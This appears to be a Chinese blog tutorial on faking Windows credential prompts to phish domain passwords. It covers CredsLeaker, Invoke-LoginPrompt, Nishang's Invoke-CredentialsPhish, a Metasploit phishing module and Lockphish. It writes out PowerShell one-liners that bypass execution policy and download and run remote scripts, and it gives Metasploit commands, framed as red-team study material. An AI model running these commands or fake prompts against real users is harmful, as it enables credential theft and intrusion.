mssql windows验证实现_揭秘 | 黑客是如何“伪造”Windows凭证的?

         世界那么大,谢谢你来看我!!关注我你就是个网络、电脑、手机小达人

本文章仅供学习,请同学自己搭建虚拟环境测试,请学习法律,尊重法律。

在Windows环境中,当程序执行时经常会需要用户输入自己的域凭证来实现身份验证,或者说在触发用户账号控制时要求用户输入凭证来实现授权或提权,这种情况是很常见的。

通过模仿Windows的这种行为,研究人员将有可能获取到Windows用户的凭证数据,而这些凭证后续将有可能被用于红队安全评估过程中的横向移动/渗透。

PowerShell方法

Windows安全输入提示非常常见,因为公司环境中的应用程序可能会定期要求用户进行身份验证。Microsoft outlook是一种通常在域环境中执行凭据请求的产品。

CredsLeaker这款软件可以尝试模拟Windows的安全提示,它可以使用Web服务器来将用户输入的凭证密码以文件的形式进行存储,并利用PowerShell来调用HTTP请求。

其中,PowerShell命令可以直接通过BAT文件来调用和执行。

run.bat

baf3035b7571ee26d8f4015248302778.png

在执行BAT文件之前,我们需要修改配置负责存储配置文件、PHP以及PowerShell文件的Web服务器。当BAT文件执行后,将会弹出Windows安全窗口并显示给用户。

5cfb23803371c351acadae9f672c208e.png

该工具会对获取到的凭证进行验证,只有当用户提供正确的密码时,安全弹窗才会消失,域、主机名、用户名和密码将写入以下位置。

/var/www/html/creds.txt

f88fb607a1e505fbe2a47734f64233b5.png

Matt Nelson开发了一个PowerShell脚本,它能够生成一个可以验证凭证是否有效的输入弹窗,并且只有当输入凭证正确时弹窗才会关闭。该脚本可以通过远程执行,并在命令控制台中显示凭证。powershell.exe -ep Bypass -c IEX ((New-Object
Net.WebClient).DownloadString('http://10.0.0.13/tmp/Invoke-LoginPrompt.ps1'));
Invoke-LoginPrompt

73205f81bdb71487043e819a77403ade.png

Nishang框架同样包含了一个能够创建伪造输入弹窗的PowerShell脚本。

c81a38ff114bbbd27fb2ca72acad0d2d.png

输入弹窗将包含一条消息,告诉用户执行此操作需要凭据。更具安全意识的用户可能会发现某些内容已在后台执行了,但攻击操作不会同时对所有公司用户执行。

5764a47d9bd3ac6948ff0794241f4e33.png

当用户的凭据输入到Windows框中时,这些凭据将在命令控制台中显示。

8b0a21de6f6ea0b632b54f107fda76b4.png

或者,我们也可以从远程位置执行该脚本以绕过检测。

powershell.exe -ep Bypass -c IEX ((New-Object
Net.WebClient).DownloadString('http://10.0.0.13/tmp/Invoke-
CredentialsPhish/ps1')); Invoke-CredentialsPhish

9d118c7338f79ff4dc166145feea4b6a.png

Metasploit方法

Metasploit Framework有一个模块,它可以在特定进程或任意进程创建时生成一个输入弹窗,该模块必须跟一个现有的Meterpreter会话绑定。

use post/windows/gather/phish_windows_credentials   set SESSION 3   set
PROCESS *   run

a726c06c6eab9f16c006784030281753.png

通配符*指示模块监视系统上运行的所有进程,并等待新实例启动,以便向用户显示伪造的输入提示。

79cfff50c57057e830196f27228d2005.png

输入提示将作为进程的凭证请求显示给用户。

da4a2a6891cccdc83d92dc1664d3125c.png

当用户输入他的凭据时,这些凭据将被捕获并显示在控制台中。

1034718a55a00193519cb9793f6e0159.png

或者,可以将模块配置为仅监视特定进程的创建。

8fa3e8d4a6af72ba71c7ffd76c4cec3f.png

钓鱼方法

Lockphish这款工具同样能够伪造Windows登录界面并帮助攻击者执行钓鱼攻击,相关的伪造模板需要托管在PHP服务器中。

bash lockphish.sh

8c39a421813e2cfb75e3c5663c8ab630.png

为了诱骗用户点击登录界面中的按钮或链接,攻击者还需要配合社会工程学技术。

3bf5da86921edbc313113d40432725e1.png

此时,工具会在需要管理员账户密码的用户界面上显示一个伪造的登录界面。但是与其他工具相比,这个工具所伪造的界面密码字段有些对不整齐。

一旦用户输入他的凭据,工具就会将用户重定向到你设置的网站。

1973058110be7aab19db3e52f34fea07.png此时,用户输入的凭证将会显示在控制台中。

怎么样,看到这里你是不是有些想法了呢?不过提醒一下,仅供学习,请自己搭建虚拟环境测试。请学习法律,尊重法律。

声明:本人分享该教程是希望大家,通过这个教程了解信息安全并提高警惕!本教程仅限于教学使用,不得用于其他用途触犯法律,本人一概不负责,请知悉!

免责声明:本文旨在传递更多市场信息,不构成任何投资建议和其他非法用途。文章仅代表作者观点,不代表手机电脑双黑客立场。以上文章之对于正确的用途,仅适用于学习

d51fddc40ab1c37048ab616240058dba.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值